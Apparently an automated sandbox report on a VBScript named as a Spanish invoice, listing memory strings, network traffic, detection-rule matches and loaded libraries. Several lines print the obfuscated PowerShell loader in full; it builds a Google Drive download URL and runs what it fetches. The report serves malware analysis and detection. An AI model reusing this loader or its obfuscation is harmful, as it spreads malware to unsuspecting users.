Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1364056176.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364907873.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1375982993.0000013D6D270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab(
Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.De
Source: wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef167
Source: wscript.exe, 00000000.00000003.1363955829.0000013D6D29D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.1485282092.000001C5818BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbHP
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1485282092.000001C5812CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.8:49707 version: TLS 1.2

System Summary

barindex
Source: amsi64_1644.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6649
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6649Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErklJump to behavior
Source: FACTURA 130424435.vbsInitial sample: Strings found which are bigger than 50
Source: amsi64_1644.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1644, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000002.00000002.1525907619.000001C5EA9ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBPe
Source: classification engineClassification label: mal100.expl.evad.winVBS@6/6@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cabassou.TunJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xef2zxxa.h5r.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: FACTURA 130424435.vbsReversingLabs: Detection: 23%
Source: FACTURA 130424435.vbsVirustotal: Detection: 11%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErklJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
